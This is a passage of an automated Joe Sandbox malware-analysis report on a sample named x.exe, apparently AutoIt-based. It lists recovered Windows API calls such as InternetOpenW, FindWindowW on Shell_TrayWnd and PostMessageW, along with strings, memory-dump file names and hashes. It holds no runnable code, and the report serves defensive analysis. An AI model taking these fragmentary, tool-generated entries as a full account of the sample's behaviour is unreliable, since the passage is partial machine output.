• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: InternetOpen
• String ID: <local>
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove
• String ID: u,D
APIs
• _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 00401B57
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
• String ID: @EXITCODE
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• wsprintfW.USER32 ref: 0045612A
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
APIs
• InternetCloseHandle.WININET(?), ref: 00442663
• InternetCloseHandle.WININET ref: 00442668
  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                                                    • String ID: aeB
                                                                                                                                                    • API String ID: 857135153-906807131
                                                                                                                                                    • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                    • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                                                    • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                    • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsncpy
                                                                                                                                                    • String ID: ^B$C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                    • API String ID: 1735881322-548649498
                                                                                                                                                    • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                                                    • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                                                                                                    • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                                                    • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                    • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                    • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                                                    • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                    • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                    • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                    • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                                                    • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                    • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                                                    APIs
                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                                                      • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message_doexit
                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                    • API String ID: 1993061046-4017498283
                                                                                                                                                    • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                    • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                                                    • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                    • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D